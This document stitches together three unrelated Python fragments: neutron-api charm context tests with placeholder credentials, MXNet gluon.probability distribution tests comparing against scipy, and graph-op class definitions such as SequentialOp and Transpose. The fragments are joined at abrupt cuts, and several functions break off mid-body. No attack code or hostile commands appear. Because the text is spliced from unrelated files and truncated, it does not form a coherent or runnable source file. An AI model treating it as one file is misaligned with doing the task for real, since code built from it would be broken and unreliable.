self.test_config.set('plumgrid-virtual-ip', '192.168.100.250')
self.test_config.set('midonet-origin', 'mem-1.9')
self.test_config.set('mem-username', 'yousir')
self.test_config.set('mem-password', '<PASSWORD>')
self.test_config.set('enable-ml2-port-security', True)
self.test_config.set('dhcp-agents-per-network', 3)
def tearDown(self):
super(NeutronCCContextTest, self).tearDown()
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_no_setting(self, _import, plugin, nm):
plugin.return_value = None
ctxt_data = {
'debug': True,
'enable_dvr': False,
'l3_ha': False,
'dhcp_agents_per_network': 3,
'enable_sriov': False,
'external_network': 'bob',
'neutron_bind_port': self.api_port,
'verbose': True,
'l2_population': True,
'overlay_network_type': 'gre',
'quota_floatingip': 50,
'quota_health_monitors': -1,
'quota_member': -1,
'quota_network': 10,
'quota_pool': 10,
'quota_port': 50,
'quota_router': 10,
'quota_security_group': 10,
'quota_security_group_rule': 100,
'quota_subnet': 10,
'quota_vip': 10,
'vlan_ranges': 'physnet1:1000:2000',
'vni_ranges': '1001:2000',
'enable_ml2_port_security': True,
'enable_hyperv': False
}
napi_ctxt = context.NeutronCCContext()
with patch.object(napi_ctxt, '_ensure_packages'):
self.assertEquals(ctxt_data, napi_ctxt())
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_vxlan(self, _import, plugin, nm):
plugin.return_value = None
self.test_config.set('flat-network-providers', 'physnet2 physnet3')
self.test_config.set('overlay-network-type', 'vxlan')
self.test_config.set('vni-ranges', '1001:2000 3001:4000')
ctxt_data = {
'debug': True,
'enable_dvr': False,
'l3_ha': False,
'dhcp_agents_per_network': 3,
'enable_sriov': False,
'external_network': 'bob',
'neutron_bind_port': self.api_port,
'verbose': True,
'l2_population': True,
'overlay_network_type': 'vxlan',
'quota_floatingip': 50,
'quota_health_monitors': -1,
'quota_member': -1,
'quota_network': 10,
'quota_pool': 10,
'quota_port': 50,
'quota_router': 10,
'quota_security_group': 10,
'quota_security_group_rule': 100,
'quota_subnet': 10,
'quota_vip': 10,
'vlan_ranges': 'physnet1:1000:2000',
'vni_ranges': '1001:2000,3001:4000',
'network_providers': 'physnet2,physnet3',
'enable_ml2_port_security': True,
'enable_hyperv': False
}
napi_ctxt = context.NeutronCCContext()
with patch.object(napi_ctxt, '_ensure_packages'):
self.assertEquals(ctxt_data, napi_ctxt())
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_l3ha(self, _import, plugin, nm):
plugin.return_value = None
self.test_config.set('enable-l3ha', True)
self.test_config.set('overlay-network-type', 'gre')
self.test_config.set('neutron-plugin', 'ovs')
self.test_config.set('l2-population', False)
self.os_release.return_value = 'juno'
ctxt_data = {
'debug': True,
'enable_dvr': False,
'l3_ha': True,
'enable_sriov': False,
'external_network': 'bob',
'neutron_bind_port': self.api_port,
'verbose': True,
'l2_population': False,
'overlay_network_type': 'gre',
'max_l3_agents_per_router': 2,
'min_l3_agents_per_router': 2,
'dhcp_agents_per_network': 3,
'quota_floatingip': 50,
'quota_health_monitors': -1,
'quota_member': -1,
'quota_network': 10,
'quota_pool': 10,
'quota_port': 50,
'quota_router': 10,
'quota_security_group': 10,
'quota_security_group_rule': 100,
'quota_subnet': 10,
'quota_vip': 10,
'vlan_ranges': 'physnet1:1000:2000',
'vni_ranges': '1001:2000',
'enable_ml2_port_security': True,
'enable_hyperv': False
}
napi_ctxt = context.NeutronCCContext()
with patch.object(napi_ctxt, '_ensure_packages'):
self.assertEquals(ctxt_data, napi_ctxt())
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_sriov(self, _import, plugin, nm):
plugin.return_value = None
self.test_config.set('enable-sriov', True)
ctxt_data = {
'debug': True,
'enable_dvr': False,
'l3_ha': False,
'dhcp_agents_per_network': 3,
'enable_sriov': True,
'external_network': 'bob',
'neutron_bind_port': self.api_port,
'verbose': True,
'l2_population': True,
'overlay_network_type': 'gre',
'quota_floatingip': 50,
'quota_health_monitors': -1,
'quota_member': -1,
'quota_network': 10,
'quota_pool': 10,
'quota_port': 50,
'quota_router': 10,
'quota_security_group': 10,
'quota_security_group_rule': 100,
'quota_subnet': 10,
'quota_vip': 10,
'vlan_ranges': 'physnet1:1000:2000',
'vni_ranges': '1001:2000',
'enable_ml2_port_security': True,
'enable_hyperv': False
}
napi_ctxt = context.NeutronCCContext()
with patch.object(napi_ctxt, '_ensure_packages'):
self.assertEquals(ctxt_data, napi_ctxt())
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_unsupported_overlay(self, _import, plugin, nm):
plugin.return_value = None
self.test_config.set('overlay-network-type', 'bobswitch')
with self.assertRaises(Exception) as context:
context.NeutronCCContext()
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_api_rel(self, _import, plugin, nm):
nova_url = 'http://127.0.0.10'
plugin.return_value = None
self.related_units.return_value = ['unit1']
self.relation_ids.return_value = ['rid2']
self.test_relation.set({'nova_url': nova_url,
'restart_trigger': 'bob'})
napi_ctxt = context.NeutronCCContext()
self.assertEquals(nova_url, napi_ctxt()['nova_url'])
self.assertEquals('bob', napi_ctxt()['restart_trigger'])
self.assertEquals(self.api_port, napi_ctxt()['neutron_bind_port'])
def test_neutroncc_context_manager(self):
napi_ctxt = context.NeutronCCContext()
self.assertEquals(napi_ctxt.network_manager, 'neutron')
self.assertEquals(napi_ctxt.plugin, 'ovs')
self.assertEquals(napi_ctxt.neutron_security_groups, True)
def test_neutroncc_context_manager_pkgs(self):
napi_ctxt = context.NeutronCCContext()
with patch.object(napi_ctxt, '_ensure_packages') as ep:
napi_ctxt._ensure_packages()
ep.assert_has_calls([])
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_nsx(self, _import, plugin, nm):
plugin.return_value = 'nsx'
self.related_units.return_value = []
self.test_config.set('neutron-plugin', 'nsx')
napi_ctxt = context.NeutronCCContext()()
expect = {
'nsx_controllers': 'ctrl1,ctrl2',
'nsx_controllers_list': ['ctrl1', 'ctrl2'],
'nsx_l3_uuid': 'l3uuid',
'nsx_password': '<PASSWORD>',
'nsx_tz_uuid': 'tzuuid',
'nsx_username': 'bob',
}
for key in expect.iterkeys():
self.assertEquals(napi_ctxt[key], expect[key])
@patch.object(context.NeutronCCContext, 'network_manager')
@patch.object(context.NeutronCCContext, 'plugin')
@patch('__builtin__.__import__')
def test_neutroncc_context_nuage(self, _import, plugin, nm):
plugin.return_value = 'vsp'
self.related_units.return_value = ['vsdunit1']
self.relation_ids.return_value = ['vsdrid2']
self.test_config.set('neutron-plugin', 'vsp')
napi_ctxt = context.NeutronCCContext()()
expect = {
'vsd_server': '192.168.2.202',
'vsd_auth': '<PASSWORD>',
'vsd_organization': 'foo',
'vsd_base_uri': '/nuage/api/v1_0',
'vsd_netpart_name': 'foo-enterprise',
}
for key in expect.iterkeys():
self.assertEquals(napi_ctxt[key], expect[key])
class EtcdContextTest(CharmTestCase):
def setUp(self):
super(EtcdContextTest, self).setUp(context, TO_PATCH)
self.relation_get.side_effect = self.test_relation.get
self.config.side_effect = self.test_config.get
self.test_config.set('neutron-plugin', 'Calico')
def tearDown(self):
super(EtcdContextTest, self).tearDown()
def test_etcd_no_related_units(self):
self.related_units.return_value = []
ctxt = context.EtcdContext()()
expect = {'cluster': ''}
self.assertEquals(expect, ctxt)
def test_some_related_units(self):
self.related_units.return_value = ['unit1']
self.relation_ids.return_value = ['rid2', 'rid3']
result = (
'testname=http://172.18.18.18:8888,'
'testname=http://172.18.18.18:8888'
)
self.test_relation.set({'cluster': result})
ctxt = context.EtcdContext()()
expect = {'cluster': result}
self.assertEquals(expect, ctxt)
def test_early_exit(self):
self.test_config.set('neutron-plugin', 'notCalico')
self.related_units.return_value = ['unit1']
self.relation_ids.return_value = ['rid2', 'rid3']
self.test_relation.set({'ip': '172.18.18.18',
'port': 8888,
'name': 'testname'})
ctxt = context.EtcdContext()()
expect = {'cluster': ''}
self.assertEquals(expect, ctxt)
class NeutronApiSDNContextTest(CharmTestCase):
def setUp(self):
super(NeutronApiSDNContextTest, self).setUp(context, TO_PATCH)
self.relation_get.side_effect = self.test_relation.get
def tearDown(self):
super(NeutronApiSDNContextTest, self).tearDown()
def test_init(self):
napisdn_ctxt = context.NeutronApiSDNContext()
self.assertEquals(
napisdn_ctxt.interfaces,
['neutron-plugin-api-subordinate']
)
self.assertEquals(napisdn_ctxt.services, ['neutron-api'])
self.assertEquals(
napisdn_ctxt.config_file,
'/etc/neutron/neutron.conf'
)
@patch.object(charmhelpers.contrib.openstack.context, 'log')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
@patch.object(charmhelpers.contrib.openstack.context, 'related_units')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
def ctxt_check(self, rel_settings, expect, _rids, _runits, _rget, _log):
self.test_relation.set(rel_settings)
_runits.return_value = ['unit1']
| |
<filename>tests/python/unittest/test_gluon_probability_v1.py<gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test gluon.probability with HybridBlock.hybrid_forward api
"""
import mxnet as mx
import numpy as _np
from mxnet import np, npx, autograd
from mxnet import gluon
import mxnet.gluon.probability as mgp
from mxnet.gluon.probability import StochasticBlock, StochasticSequential
from mxnet.gluon import HybridBlock
from mxnet.test_utils import use_np, assert_almost_equal
from numpy.testing import assert_array_equal
import pytest
import scipy.stats as ss
import scipy.special as scipy_special
import itertools
from numbers import Number
def prob_to_logit(prob):
return np.log(prob) - np.log1p(-prob)
def _distribution_method_invoker(dist, func, *args):
"""Wrapper for invoking different types of class methods with one unified
interface.
Parameters
----------
dist : Distribution
func : method
"""
if (len(args) == 0):
out = getattr(dist, func)
if callable(out):
return out()
else:
return out
return getattr(dist, func)(*args)
def test_mgp_getF_v1():
# Test getF
getF = mgp.utils.getF
nd = mx.nd
sym = mx.sym
assert getF(nd.ones((2, 2)), nd.ones((2, 2))) == nd
assert getF(sym.ones((2, 2)), sym.ones((2, 2))) == sym
assert getF(1.0, 2.0) == nd
# Test exception
with pytest.raises(TypeError):
getF(nd.ones((2, 2)), sym.ones((2, 2)))
getF(sym.ones((2, 2)), nd.ones((2, 2)))
@use_np
def test_gluon_uniform_v1():
class TestUniform(HybridBlock):
def __init__(self, func):
super(TestUniform, self).__init__()
self._func = func
def hybrid_forward(self, F, low, high, *args):
uniform = mgp.Uniform(low, high, validate_args=True)
return _distribution_method_invoker(uniform, self._func, *args)
shapes = [(), (1,), (2, 3), 6]
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
low = np.random.uniform(-1, 1, shape)
high = low + np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(low, high)
net = TestUniform("log_prob")
if hybridize:
net.hybridize()
for i in range(2):
mx_out = net(low, high, samples).asnumpy()
np_out = ss.uniform(low.asnumpy(),
(high - low).asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
low = np.random.uniform(-1, 1, shape)
high = low + np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(low, high)
net = TestUniform("cdf")
if hybridize:
net.hybridize()
mx_out = net(low, high, samples).asnumpy()
np_out = ss.uniform(low.asnumpy(),
(high - low).asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
low = np.random.uniform(-1, 1, shape)
high = low + np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(size=shape)
net = TestUniform("icdf")
if hybridize:
net.hybridize()
mx_out = net(low, high, samples).asnumpy()
np_out = ss.uniform(low.asnumpy(),
(high - low).asnumpy()).ppf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test entropy
for shape, hybridize in itertools.product(shapes, [True, False]):
low = np.random.uniform(-1, 1, shape)
high = low + np.random.uniform(0.5, 1.5, shape)
net = TestUniform("entropy")
if hybridize:
net.hybridize()
mx_out = net(low, high).asnumpy()
np_out = ss.uniform(low.asnumpy(),
(high - low).asnumpy()).entropy()
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_normal_v1():
class TestNormal(HybridBlock):
def __init__(self, func):
super(TestNormal, self).__init__()
self._func = func
def hybrid_forward(self, F, loc, scale, *args):
normal = mgp.Normal(loc, scale, validate_args=True)
return _distribution_method_invoker(normal, self._func, *args)
shapes = [(), (1,), (2, 3), 6]
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.normal(size=shape)
net = TestNormal("log_prob")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.norm(loc.asnumpy(),
scale.asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.normal(size=shape)
net = TestNormal("cdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.norm(loc.asnumpy(),
scale.asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(size=shape)
net = TestNormal("icdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.norm(loc.asnumpy(),
scale.asnumpy()).ppf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test entropy
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
net = TestNormal("entropy")
if hybridize:
net.hybridize()
mx_out = net(loc, scale).asnumpy()
np_out = ss.norm(loc.asnumpy(),
scale.asnumpy()).entropy()
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_laplace_v1():
class TestLaplace(HybridBlock):
def __init__(self, func):
super(TestLaplace, self).__init__()
self._func = func
def hybrid_forward(self, F, loc, scale, *args):
laplace = mgp.Laplace(loc, scale, validate_args=True)
return _distribution_method_invoker(laplace, self._func, *args)
shapes = [(), (1,), (2, 3), 6]
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.laplace(size=shape)
net = TestLaplace("log_prob")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.laplace(loc.asnumpy(),
scale.asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.laplace(size=shape)
net = TestLaplace("cdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.laplace(loc.asnumpy(),
scale.asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(size=shape)
net = TestLaplace("icdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.laplace(loc.asnumpy(),
scale.asnumpy()).ppf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test entropy
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
net = TestLaplace("entropy")
if hybridize:
net.hybridize()
mx_out = net(loc, scale).asnumpy()
np_out = ss.laplace(loc.asnumpy(),
scale.asnumpy()).entropy()
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_cauchy_v1():
class TestCauchy(HybridBlock):
def __init__(self, func):
self._func = func
super(TestCauchy, self).__init__()
def hybrid_forward(self, F, loc, scale, *args):
cauchy = mgp.Cauchy(loc, scale, F, validate_args=True)
return _distribution_method_invoker(cauchy, self._func, *args)
shapes = [(), (1,), (2, 3), 6]
# Test sampling
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.normal(size=shape)
net = TestCauchy("sample")
if hybridize:
net.hybridize()
mx_out = net(loc, scale)
desired_shape = (shape,) if isinstance(shape, Number) else shape
assert mx_out.shape == desired_shape
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.normal(size=shape)
net = TestCauchy("log_prob")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.cauchy(loc.asnumpy(),
scale.asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.normal(size=shape)
net = TestCauchy("cdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.cauchy(loc.asnumpy(),
scale.asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.random.uniform(size=shape, low=1e-4, high=1.0-1e-4)
net = TestCauchy("icdf")
if hybridize:
net.hybridize()
mx_out = net(loc, scale, samples).asnumpy()
np_out = ss.cauchy(loc.asnumpy(),
scale.asnumpy()).ppf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test entropy
for shape, hybridize in itertools.product(shapes, [True, False]):
loc = np.random.uniform(-1, 1, shape)
scale = np.random.uniform(0.5, 1.5, shape)
net = TestCauchy("entropy")
if hybridize:
net.hybridize()
mx_out = net(loc, scale).asnumpy()
np_out = ss.cauchy(loc.asnumpy(),
scale.asnumpy()).entropy()
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_half_cauchy_v1():
class TestHalfCauchy(HybridBlock):
def __init__(self, func):
super(TestHalfCauchy, self).__init__()
self._func = func
def hybrid_forward(self, F, scale, *args):
half_normal = mgp.HalfCauchy(scale, F, validate_args=True)
return getattr(half_normal, self._func)(*args)
shapes = [(), (1,), (2, 3), 6]
# Test sampling
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
net = TestHalfCauchy("sample")
if hybridize:
net.hybridize()
mx_out = net(scale).asnumpy()
if isinstance(shape, Number):
shape = (shape,)
assert mx_out.shape == shape
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.abs(np.random.normal(size=shape))
net = TestHalfCauchy("log_prob")
if hybridize:
net.hybridize()
mx_out = net(scale, samples).asnumpy()
np_out = ss.halfcauchy(0, scale.asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.abs(np.random.normal(size=shape))
net = TestHalfCauchy("cdf")
if hybridize:
net.hybridize()
mx_out = net(scale, samples).asnumpy()
np_out = ss.halfcauchy(0, scale.asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples | |
y.
delta: Backprop amount for this Op.
*args: The args of this Op.
"""
pass
@property
def shape(self):
"""
This is required for parameter initializers in legacy neon code. It
expects layers to implement a shape that it can use to pass through
layers.
Returns: self.axes
"""
return self.axes
def shape_dict(self):
"""
Retuns: shape of this tensor as a dictionary
"""
return self.axes.shape_dict()
def mean(self, reduction_axes=None, out_axes=None):
"""
Used in Neon front end.
Returns: mean(self)
"""
return mean(self, reduction_axes=reduction_axes, out_axes=out_axes)
class ValueOp(TensorOp, ControlBlockOp):
"""
Mixin class for ops whose value is another op.
Arguments:
tensor: The tensor supplying the value for this op.
"""
def __init__(self, tensor=None, **kwargs):
super(ValueOp, self).__init__(args=(), is_value_op=True, **kwargs)
self._tensor = tensor
def tensor_description(self):
return self.tensor.tensor_description()
@property
def tensor(self):
"""
The op that ultimately supplies the value. See value_tensor.
Returns:
The op that supplies the value.
"""
if self._tensor is not None:
return self._tensor.forwarded.tensor.forwarded
else:
return None
@property
def value_tensor(self):
"""
The op whose value is returned by this op.
Returns:
The immediate value returned by this op; see tensor for the closure.
"""
if self._tensor is not None:
return self._tensor.forwarded
else:
return None
@value_tensor.setter
def value_tensor(self, tensor):
self._tensor = tensor
@property
def all_deps(self):
"""
TODO: use cached property as other Op
"""
base_deps = super(ValueOp, self).all_deps
if self.value_tensor is not None and self.value_tensor.is_device_op:
# Add value_tensor if it is a real op
return base_deps | OrderedSet([self.value_tensor])
else:
return base_deps
@property
def is_tensor_op(self):
return self.tensor.is_tensor_op
@property
def axes(self):
return self.tensor.axes
@property
def dtype(self):
return self.tensor.dtype
@dtype.setter
def dtype(self, dtype):
self.tensor.dtype = default_dtype(dtype)
@property
def is_constant(self):
return self.tensor.is_constant
@property
def const(self):
return self.tensor.const
@property
def scale(self):
return self.tensor.scale
@property
def states_read(self):
return self.value_tensor.states_read
@property
def states_written(self):
return self.value_tensor.states_written
def generate_add_delta(self, adjoints, delta):
self.tensor.generate_add_delta(adjoints, delta)
@property
def effective_tensor_op(self):
# Due to hard to correct class hierarchy, state access is wrapped in ValueOp, but we
# always want state access wrapped in a state reader such as TensorValueOp, so we
# need to resort to some ugliness here.
tensor = self._tensor
if tensor.is_state_op:
return self.forwarded
return tensor.effective_tensor_op
class SequentialOp(ValueOp):
"""
Given a list of ops, ensure that every op that has not already been executed is executed in
the given order. The value of the last op is the value of this op.
Ops will only be executed once, so to return the value of an earlier op, just add it again at
the end of the list.
Control dependencies are not computed until after the graph is computed, i.e. after derivatives
are expanded.
Arguments:
ops: Sequence of ops to compute. If not specified, set the attribute ops when known. This
is useful for subclassing.
Attributes:
ops: The list of ops to be computed. The last op is the returned value.
"""
def __init__(self, ops=None, **kwargs):
super(SequentialOp, self).__init__(**kwargs)
self.value_tensor = None
self._ops = None
if ops is not None:
# Legal child patterns
# 1. (AssignOp,)+, (~(SequentialOp|ParallelOp))
# 2. ParallelOp, (~(AssignOp|SequentialOp|ParallelOp))
# 3. SequentialOp, (~(AssignOp|SequentialOp|ParallelOp))
num_children = len(ops)
if num_children < 2:
raise RuntimeError("SequentialOp need at least two children")
if isinstance(ops[0], AssignOp):
if isinstance(ops[-1], (ParallelOp, SequentialOp)):
raise RuntimeError("Illegal child formation")
for op in ops[:-1]:
if not isinstance(op, AssignOp):
raise RuntimeError("Illegal child formation")
elif isinstance(ops[0], (ParallelOp, SequentialOp)):
if num_children > 2:
raise RuntimeError("Illegal child formation")
elif isinstance(ops[-1], (AssignOp, SequentialOp, ParallelOp)):
raise RuntimeError("Illegal child formation")
else:
raise RuntimeError("Illegal child formation")
self.ops = ops
@property
def ops(self):
return self._ops
@ops.setter
def ops(self, ops):
self._ops = list(as_op(op).forwarded for op in ops)
for op in self._ops:
self.add_control_dep(op)
self.value_tensor = self._ops[-1]
# Ops that have already executed.
done_ops = set()
# State => op_tops that have written state
writers = defaultdict(OrderedSet)
# State => op_tops that have read state
readers = defaultdict(OrderedSet)
for op_top in self._ops:
ordered_ops = Op.ordered_ops([op_top])
# Make ops that read/write state execute after the op_tops that last read/wrote
# the state.
for op in ordered_ops:
if op in done_ops:
# The op already ran, so it doesn't run here
continue
for state in op.states_read:
for write_op in writers[state]:
op.add_control_dep(write_op)
for state in op.states_written:
for read_op in readers[state]:
op.add_control_dep(read_op)
# Register this op_top with each state it read/wrote.
for op in ordered_ops:
if op in done_ops:
# The op already ran, so it doesn't run here
continue
for state in op.states_written:
writers[state].add(op_top)
for state in op.states_read:
readers[state].add(op_top)
done_ops.update(ordered_ops)
@property
def is_sequencing_op(self):
"""
Returns:
True if this op's sole purpose is to influence the sequencing of other ops.
"""
return True
def sequential(ops=None):
"""
Compute every op in order, compatible with existing dependencies, returning last value.
Ops will only be executed once, so to return the value of an earlier op, just add it again at
the end of the list.
Arguments:
ops: Sequence of ops to compute.
"""
sequential_op = SequentialOp(ops)
sequential_op.deriv_handler = sequential_op.value_tensor
# Note: Can't return value_tensor here because we may need some ops to execute
# after it. For example,
# op_1, op_2, op_3, op_1 has value of op_1, but op_1 won't force op_2 and op_3 to run.
return sequential_op
class TensorValueOp(ValueOp):
"""
A read of an AssignableTensorOp.
This provides a way to maintain different control information on different
versions of state.
Arguments:
tensor: The tensor being wrapped.
"""
def __init__(self, tensor, **kwargs):
super(TensorValueOp, self).__init__(tensor=tensor, **kwargs)
for key in ['device', 'device_id', 'parallel']:
if key in tensor.metadata:
self.metadata[key] = tensor.metadata[key]
@property
def states_read(self):
return OrderedSet([self.tensor])
@property
def effective_tensor_op(self):
return self.forwarded
class PatternLabelOp(TensorOp):
"""
An op to represent label in the pattern to be matched in graph
constraint_fn is a predicate that must hold in order to bind the
label to its matching op. By default, constraint_fn is always true.
"""
def __init__(self, label, constraint_fn=(lambda op: True), axes=None, **kwargs):
if axes is None:
axes = {}
super(PatternLabelOp, self).__init__(axes=axes, **kwargs)
self.label = label
self.constraint_fn = constraint_fn
class PatternSkipOp(TensorOp):
"""
An op to allow user of pattern matching to skip match for certain ops
is_optional_op_fn is a predicate that must be defined to specify
optional ops. By default, is_optional_op_fn is false.
"""
def __init__(self, arg, is_optional_op_fn=(lambda op: False), **kwargs):
super(PatternSkipOp, self).__init__(axes={}, args=(arg,), **kwargs)
self.is_optional_op_fn = is_optional_op_fn
class IndexOp(with_metaclass(abc.ABCMeta, TensorOp)):
"""
An base class for ops that change how a tensor is indexed; i.e. get a view of the same tensor.
Arguments:
x: A view of a tensor.
Returns:
A view of the tensor.
"""
def __init__(self, x, **kwargs):
super(IndexOp, self).__init__(
args=(x,),
dtype=x.dtype,
**kwargs
)
@abc.abstractmethod
def transform_tensor_description(self, tensor_description):
"""
Apply this index operation to tensor_description.
Args:
tensor_description: TensorDescription of the input view.
Returns:
TensorDescription of the transformed view.
"""
@tdcache()
def tensor_description(self):
return self.transform_tensor_description(self.args[0].tensor_description()).named(
self.name)
@property
def is_scalar(self):
"""
Reshape adds shape information, but we retain being a scalar.
Returns:
True if the value comes from a scalar.
"""
return self.args[0].is_scalar
@property
def scalar_op(self):
return self.args[0].scalar_op
@property
def is_constant(self):
return self.args[0].is_constant
@property
def const(self):
return self.args[0].const
@property
def is_device_op(self):
"""
Returns:
False, because this is handled by the transformer.
"""
return False
@property
def states_read(self):
# Reshapes are views of the underlying tensor, so the states are the same.
return self.args[0].states_read
class Transpose(IndexOp):
"""
Used to reverse the axes of a tensor.
Arguments:
x: A tensor.
"""
def __init__(self, x, **kwargs):
super(Transpose, self).__init__(
x,
axes=reversed(x.axes),
**kwargs
)
def transform_tensor_description(self, tensor_description):
return tensor_description.transpose()
def generate_adjoints(self, adjoints, delta, x):
x.generate_add_delta(adjoints, Transpose(delta))
class AxesCastOp(IndexOp):
"""
Used to label a tensor with known axes, without altering its value
Arguments:
x: A tensor.
axes: The new axes.
"""
def __init__(self, x, axes, **kwargs):
axes = make_axes(axes)
self._check_valid_axes(x, axes)
